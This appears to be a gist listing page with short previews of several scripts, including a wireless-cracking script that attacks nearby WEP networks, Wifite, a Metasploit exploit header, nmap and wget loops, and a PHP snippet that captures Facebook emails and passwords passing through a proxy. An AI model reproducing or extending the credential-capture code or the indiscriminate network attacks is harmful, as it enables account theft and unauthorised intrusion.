This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #__________________________________________________________ | |
| # Author: phillips321 contact through phillips321.co.uk | |
| # License: CC BY-SA 3.0 | |
| # Use: All in one pentest script designed for bt5 | |
| # Released: www.phillips321.co.uk | |
| version=7.0 | |
| # Dependencies: | |
| # nmap | |
| # sslscan |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ############################################################### | |
| #Please remember that in some areas it is illegal to use this # | |
| #program without the express permission of the wifi,s owner # | |
| #keeping that in mind i release this under the public domain # | |
| ############################################################### | |
| # This program will work on Ubuntu 10.04 LTS Ubuntu 9.10, Ubuntu9.04, Ubuntu 8.10 and Backtrack3/4/5 without modification | |
| # This program needs the Aircrack-ng suit to function | |
| # Run this program to automatically start attacking all WEP networks near by | |
| # This file should be saved as "autocrack.sh" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: cp1252 -*- | |
| """ WIFITE | |
| (c) 2010, 2011 derv merkler, Jose Maria Chia, Aaron | |
| Type -h or -help for command-line options | |
| """ | |
| """ TODO LIST: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # not a script, just a set of cmds | |
| # | |
| printf 'http://image.issuu.com/actual_url/jpg/page_%d.jpg\n' {1..500} > files.txt | |
| wget -i files.txt | |
| # test sed | |
| for filename in page_*.jpg; do echo $filename | sed -e 's/page\_//g'; done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for i in `cat file.txt` ; do nmap host -p$i -oA scan-$i; done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| find . -name '*.DS_Store' -type f -delete | |
| # Run this command as the user | |
| defaults write com.apple.desktopservices DSDontWriteNetworkStores true | |
| # Now can copy com.apple.desktopservices.plist files to other /users/<username>/library/preferences |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This file is part of the Metasploit Framework and may be subject to | |
| # redistribution and commercial restrictions. Please see the Metasploit | |
| # web site for more information on licensing and terms of use. | |
| # | |
| # http://metasploit.com/ | |
| ## | |
| require 'shellwords' | |
| class Metasploit3 < Msf::Exploit::Local |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /***** | |
| * parseAuth.php | |
| * By: BrokenRadix(.com) | |
| * Usage: `php parseAuth.php auth.log` | |
| * Notes: Parse the Linux auth.log for IP addresses which entered | |
| * a password for a username, then logged in correctly. | |
| *****/ | |
| ini_set(“auto_detect_line_endings”, true); // Get all line endings |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (strpos($_url, 'facebook.com')) //checks if url contains "facebook" | |
| { | |
| if ($_REQUEST['email'] != "") //only true if there is info submitted | |
| { | |
| $user = $_REQUEST['email'] ; //getting the info | |
| $pass = $_REQUEST['pass'] ; | |
| $not_me = 0 | |
| if (strpos($user, 'your_name') or strpos($pass, 'whatever_your_password_is')) //this protects yourself | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Search() { | |
| var sheet = SpreadsheetApp.getActiveSheet(); | |
| var row = 2; | |
| // Clear existing search results | |
| sheet.getRange(2, 1, sheet.getMaxRows() - 1, 4).clearContent(); | |
| // Which Gmail Label should be searched? | |
| var label = sheet.getRange("F3").getValue(); |